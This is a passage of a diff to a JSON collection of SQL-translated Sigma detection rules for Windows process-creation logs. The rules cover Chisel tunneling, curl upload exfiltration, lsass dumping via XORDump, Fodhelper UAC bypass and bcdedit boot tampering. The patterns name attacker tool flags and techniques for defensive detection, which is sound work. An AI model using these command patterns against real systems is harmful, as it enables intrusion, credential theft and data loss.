+ "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + 
"attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "Remote Access Tool - GoToAssist Execution", - "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "title": "Suspicious ZipExec Execution", + "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems 
within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" + "filename": "proc_creation_win_hktl_zipexec.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a 
sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR 
CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "Suspicious Csc.exe Source File Folder", - "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", + "id": "74403157-20f5-415d-89a7-c505779585cf", "status": "test", - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. 
Which is fairly uncommon and could indicate potential suspicious activity", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + "Legitimate use to pass password to different powershell commands" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" ], - "filename": "proc_creation_win_csc_susp_folder.yml" + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Suspicious Scheduled Task Creation via Masqueraded XML File", + "id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - 
"author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", + "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.persistence", + "attack.t1036.005", + "attack.t1053.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/create%' ESCAPE '\\' OR CommandLine LIKE '%-create%' ESCAPE '\\') AND (CommandLine LIKE '%/xml%' ESCAPE '\\' OR CommandLine LIKE '%-xml%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%.xml%' ESCAPE '\\') OR (IntegrityLevel = 'System') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%:\\\\WINDOWS\\\\Installer\\\\MSI%' ESCAPE '\\' AND ParentCommandLine LIKE '%.tmp,zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\'))) AND NOT (((ParentProcessName LIKE '%:\\\\ProgramData\\\\OEM\\\\UpgradeTool\\\\CareCenter\\_%\\\\BUnzip\\\\Setup\\_msi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Camera Station\\\\SetupActions.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Device Manager\\\\AdmSetupActions.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files (x86)\\\\Zemana\\\\AntiMalware\\\\AntiMalware.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program 
Files\\\\Dell\\\\SupportAssist\\\\pcdrcui.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" }, { - "title": "Suspicious Cabinet File Execution Via Msdt.EXE", - "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "status": "experimental", - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", + "title": "Suspicious XOR Encoded PowerShell Command", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "status": "test", + "description": "Detects presence of a potentially xor encoded powershell command", + "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Legitimate usage of \".diagcab\" files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE 
'\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml" + "filename": "proc_creation_win_powershell_xor_commandline.yml" }, { - "title": "Scheduled Task Creation", - "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "title": "Potential Data Exfiltration Via Curl.EXE", + "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", "status": "test", - "description": "Detects the creation of scheduled tasks in user session", + "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.005", - "attack.s0111", - "car.2013-08-001" + "attack.exfiltration", + "attack.t1567", + "attack.t1105" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Scripts created by developers and admins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\') AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation.yml" + "filename": 
"proc_creation_win_curl_fileupload.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", - "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "test", + "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", + "author": "@neu5ron", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.persistence", + "attack.t1542.003" + ], + "level": "medium", + "rule": [ + "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_bcdedit_susp_execution.yml" + }, + { + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", "status": "test", - "description": "Detects Golden Chickens deployment method as used 
by Evilnum and described in ESET July 2020 report", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND 
CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "PUA - Potential PE Metadata Tamper Using Rcedit", - "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", - "status": "experimental", - "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", - "author": "Micah Babinski", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036", - "attack.t1027.005", - "attack.t1027" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of the tool by administrators or users to update metadata of a binary" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rcedit_execution.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "PUA - RunXCmd Execution", + "id": 
"93199800-b52a-4dec-b762-75212c196542", + "status": "test", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\')) AND NOT ((NewProcessName = '') OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName IN ('-', '')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%.scr' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files 
(x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program 